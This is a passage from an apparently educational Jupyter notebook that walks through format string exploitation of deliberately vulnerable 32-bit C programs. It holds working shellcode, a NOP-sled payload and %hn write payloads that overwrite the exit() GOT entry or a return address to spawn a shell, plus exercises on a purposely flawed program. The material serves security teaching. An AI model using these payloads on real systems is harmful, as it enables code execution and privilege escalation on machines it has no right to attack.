08049060 <exit@plt>:
 8049060:	ff 25 18 c0 04 08    	jmp    *0x804c018
 8049066:	68 18 00 00 00       	push   $0x18
 804906b:	e9 b0 ff ff ff       	jmp    8049020 <.plt>

08049070 <__libc_start_main@plt>:
 8049070:	ff 25 1c c0 04 08    	

In [70]:
# display all dynamic relocations
! objdump -R ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
0804bffc R_386_GLOB_DAT    __gmon_start__
0804c00c R_386_JUMP_SLOT   printf@GLIBC_2.0
0804c010 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804c014 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c018 R_386_JUMP_SLOT   exit@GLIBC_2.0
0804c01c R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
0804c020 R_386_JUMP_SLOT   putchar@GLIBC_2.0




- NOTE: exit()'s GOT entry OFFSET which can be overwritten with the address of smuggled shellcode

## Smuggle Shellcode & Exploit
- create shellcode using gdb-peda - see [GDB-Peda.ipynb](./GDB-Peda.ipynb) Notebook for details
- use perl -e 'print to write shellcode as a binary file' > shellcode.bin
- export shllcode as an env variable
- find and write the address of shellcode into the address of the exit() function
- you'll get a shell, when the program exits!

### steps
- stash the shellcode in env variable
- find the address of the shellcode when the vulnerable program is loaded
- find shared library function in GOT that's executed by the vulnerable program
- by exploiting format string vulnerability, write the shellcode's address to the shared function's jump address
- put it all together as a exploit code and launch it to exploit the vulnerable program

### Advantage of using GOT
- GOT entries are fixed per binary
    - different system with the same binary will have the same GOT entry at the same address
    
- ability to overwrite any arbitrary address opens up many possiblilites for exploitation
- any section of writable memory that contains an address that directs the flow of program execution can be targeted

In [71]:
! cp ./booksrc/shellcodex86linuxexec .
! cp ./booksrc/getenvaddr.c .

In [72]:
! ./compile.sh getenvaddr.c getenvaddr.exe

In [73]:
# create SHELLCODE env variable
! export SHELLCODE=$(cat shellcodex86linuxexec)

In [74]:
# get the address of SHELLCODE variable
# run it on terminal if you do not see complete address!
! ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe
# SHELLCODE will be at 0xffffc791

SHELLCODE will be at 0x4


In [75]:
# try 1, 2, 3, 4, etc, until you see hex A's printed
! ./fmt_vuln.exe $(printf "AAAA")%4\$x

The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf90


In [76]:
# let's write to a valid address
# let's first make sure we can write the valid SHELLCODE address to
# test_val
! ./fmt_vuln.exe $(printf "\x2e\xc0\x04\x08")%4\$hn

The right way to print user-controlled input:
.�%4$hn
The wrong way to print user-controlled input:
.�
[*] test_val @ 0x0804c02c = 327608 0x0004ffb8
[*] text is @ 0xffffbf90


In [77]:
# find the first width; # SHELLCODE will be at 0xffffd3fb
# 8 byts of addresses will be printed
! printf "%d" $((0xd3fb-8))

54259

In [78]:
# find the 2nd width; # SHELLCODE will be at 0xffffd3fb
! printf "%d" $((0xffff-0xd3fb))

11268

In [79]:
# let's write 0xffff using hn to two most siginificat byte at ...2e and 2f
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2e\xc0\x04\x08")%54259x%4\$hn%11268x%5\$hn

The right way to print user-controlled input:
,�.�%54259x%4$hn%11268x%5$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

In [80]:
# find the exit function's address in GOT and write SHELLCODE address to it
! objdump -R ./fmt_vuln.exe | grep exit

0804c018 R_386_JUMP_SLOT   exit@GLIBC_2.0


In [81]:
! printf "%x" $((0x18+2))

1a

In [82]:
# Simply replace test_val's address with exit() address in the same order
! ./fmt_vuln.exe $(printf "\x18\xc0\x04\x08\x1a\xc0\x04\x08")%54259x%4\$hn%11268x%5\$hn

The right way to print user-controlled input:
��%54259x%4$hn%11268x%5$hn
The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

#### run the above command on terminal to get actually see the exploit code working

## Smuggle exploit code into the text buffer
- instead of stashing the Shellcode in environment variable, send it to the program and make the program execute it by overwriting the exit() function in GOT
### Steps
1. create a string in this format: NOP Sled | Exploit Code
2. find the address of exit()
3. Overwrite the address of exit with the address of text buffer
    - exploit printf vulnerability to overwrite the address with your controlled address where the explot code resides

In [83]:
# find the size of exploit code
! wc -c ./shellcodex86linuxexec
# shellcode is 24 bytes

24 ./shellcodex86linuxexec


In [155]:
# create a string that's multiple of 4
# text buffer is 1024 bytes big
! perl -e 'print "\x90"x12' > exploit_fmt

In [156]:
! wc -c ./exploit_fmt

12 ./exploit_fmt


In [157]:
# let'S append Shellcode to the exploit code after the NOP sled
! cat shellcodex86linuxexec >> exploit_fmt

In [158]:
! wc -c exploit_fmt

36 exploit_fmt


In [159]:
! hexdump -C exploit_fmt

00000000  90 90 90 90 90 90 90 90  90 90 90 90 31 c0 50 68  |............1.Ph|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 31 c9 89 ca 6a  |//shh/bin..1...j|
00000020  0b 58 cd 80                                       |.X..|
00000024


#### find the address of text buffer using gdb
- can't easily find the actual address of text buffer
- it shifts as we run the program with some arguments (size of the arguments matter), environment variables, program name, etc.
- gdb also sets its own environment variables such as LINES, COLUMNS, etc.
<img src="resources/gdb-env.png">
- detail: https://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it/17775966#17775966

```bash
$ gdb -q ./fmt_vuln.exe
$ break main
$ run "try with as much string as close to actual exploit code that will be sent to the program"
$ p/x &text
```


```bash
$ run $(perl -e 'print "A"x4')
$ p/x &text
output: $1 = 0xffffcc70

$ run $(perl -e 'print "A"x181')
$ p/x &text
output: $1 = 0xffffcbc0
```

- we get different value outside the gdb
- there are workaround but a little tidious...
- for shake of learning and easiness, the address of text is printed!

In [161]:
! ./fmt_vuln.exe $(perl -e 'print "A"x50')
# notebook gives different address than than the terminal; try it!

The right way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The wrong way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf60


## This works better when done directly on Terminal
- as address of text changes depending on where and how's it's run (with what argument)

In [169]:
# find the right paramenter number that starts repeating the AAAA in hex
# try 1...n
! ./fmt_vuln.exe $(cat exploit_fmt)$(printf "AAAABBBB")%13\$x
# we already no parameter #4 is where AAAA repeats again

The right way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀AAAABBBB%13$x
The wrong way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀AAAABBBB41414141
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf60


In [172]:
# let's use test_val's address to write data
# now notice the address of text
! ./fmt_vuln.exe $(cat exploit_fmt)$(printf "\x2c\xc0\x04\x08\x2e\xc0\x04\x08")%13\$hn

The right way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀,�.�%13$hn
The wrong way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀,�.�
[*] test_val @ 0x0804c02c = -65492 0xffff002c
[*] text is @ 0xffffbf60


In [173]:
# find the widths to write controlled address to exit address
# least 2 significant bytes
# [*] text is @ 0xffffbfe0 - from terminal not notebook!
# Note: we need to print shellcode code with nop sled of size 36
# we're need to write 2 4-byte addresses to access and print the address
# of exploit code
! printf "%d" $((0xbfe0-36-8))
# !!!IMP: this may not be the final width! Keep looking at the address of text!!!

49076

In [171]:
# most 2 significant bytes
! printf "%d" $((0xffff-0xbfe0))

16415

In [166]:
# let's first write to test_val to make sure we're writing the right address
! ./fmt_vuln.exe $(cat exploit_fmt)$(printf "\x2c\xc0\x04\x08\x2e\xc0\x04\x08")%49076x%13\$hn%16415x%14\$hn

The right way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀,�.�%49076x%13$hn%16415x%14$hn
The wrong way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

In [167]:
# find the address of exit in GOT to write to
! objdump -R ./fmt_vuln.exe | grep exit

0804c018 R_386_JUMP_SLOT   exit@GLIBC_2.0


In [168]:
# now write the shellcode plus printf exploit to exit()
! ./fmt_vuln.exe $(cat exploit_fmt)$(printf "\x18\xc0\x04\x08\x1a\xc0\x04\x08")%49076x%13\$hn%16415x%14\$hn

The right way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀��%49076x%13$hn%16415x%14$hn
The wrong way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

### Finally, adjust the width!
- recreate the exploit and launch with the new values

In [174]:
! printf "%d" $((0xbfd0-36-8))

49060

In [175]:
! printf "%d" $((0xffff-0xbfd0))

16431

In [176]:
# runt the final exploit code on Terminal
! ./fmt_vuln.exe $(cat exploit_fmt)$(printf "\x18\xc0\x04\x08\x1a\xc0\x04\x08")%49060x%13\$hn%16431x%14\$hn

The right way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀��%49060x%13$hn%16431x%14$hn
The wrong way to print user-controlled input:
������������1�Ph//shh/bin��1ɉ�jX̀��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             

## Exercise 1
- stash your shellcode in shell environment and and exploit the `format string` vulnerability in fmt_vuln2.c to execute the shellcode by modifying the return address to the address of shellcode in environment variable.

### steps:
- stash your shellcode in shell environment
- find the address of shellcode using getenvaddr program
- find the nth parameter that'll crash fmt_vuln2 program
```
$ perl -e 'print "AAAA%x%x%x%x%x%x%x"' | ./fmt_vuln2.exe 
$ perl -e 'print "AAAA%x%x%x%x%x%x%7\$x"' | ./fmt_vuln2.exe
$ perl -e 'print "return address%7\$n"' | ./fmt_vuln2.exe
$ perl -e 'print "two return addresses%widthx%7\$hn%widthx%8\$hn' | ./fmt_vuln2.exe
```
- doing some math, update the return address using half-write with shellcode address

In [337]:
! cat fmt_vuln2.c

#include <stdio.h>
#include <string.h>

void badfunction(char *data) {
    char input[200];
    //printf("Enter your name: ");
    // scanf gives segfault
    //scanf("%s", input);
    // fgets doesn't work!
    //fgets(input, sizeof(input)-1, stdin);
    strcpy(input, data);
    printf("Hello, ");
    printf(input);
    printf("\ninput is @ 0x%08x\n", &input);
    register int ebp asm("ebp");
    printf("return address @ 0x%08x\n", (ebp+4));
    // would be be nice to be able to print value at return add
}

int main(int argc, char* argv[]) {
    badfunction(argv[1]);
    printf("%s\n", "good bye!");
    return 0;
}

In [144]:
! ./compile.sh fmt_vuln2.c fmt_vuln2.exe

In [145]:
! ls -al fmt_vuln2.exe

-rwxr-xr-x 1 kali kali 17928 Aug 23 20:53 fmt_vuln2.exe


- complete the rest

## Exercise 2
- Smuggle your `shellcode` as a part of data into the program and exploit the `format string` vulnerability in fmt_vuln2.c program found in this repo by modifying the return address to point to the exploit code.

### steps
- works on 32-bit and 64-bit Kali

```bash
- compile and make fmt_vuln2.c program a privileged program
- run the program to note the return address and the address of input buffer
- create an exploit file with 12 (nop sled) + 24 (shellcode) = 36 bytes it makes it easier if the total bytes is multiple of 4
$ perl -e 'print "\x90"x12' > fmt_vuln2exploit.txt
$ cat shellcode.bin >> fmt_vuln2exploit.txt
$ wc -c fmt_vuln2exploit.txt
- find out the right parameter number that starts repeating AAAA in hex
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(printf "AAAA")%1\$x
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(printf "AAAA")%2\$x
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(printf "AAAA")%15\$x
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(printf "AAAA")%15\$x
- now find the width parameter to write the address of input buffer at the return address: let's say:
    - input is @ 0xffffc2e8
    - return address @ 0xffffc3bc
$ find the width for the least 2 significant bytes
$ printf "%d" $((0xc2e8-36-8)) # 36 bytes is exploit code get's printed as well. => 49852
$ printf "%d" $((0xffff-0xc2f8)) # -> 15639
- final exploit will look something like this...
$ ./fmt_vuln2.exe $(cat fmt_vuln2exploit.txt)$(printf "\xbc\xc3\xff\xff\xbe\xc3\xff\xff")%49852x%15\$hn%15639x%16\$hn
```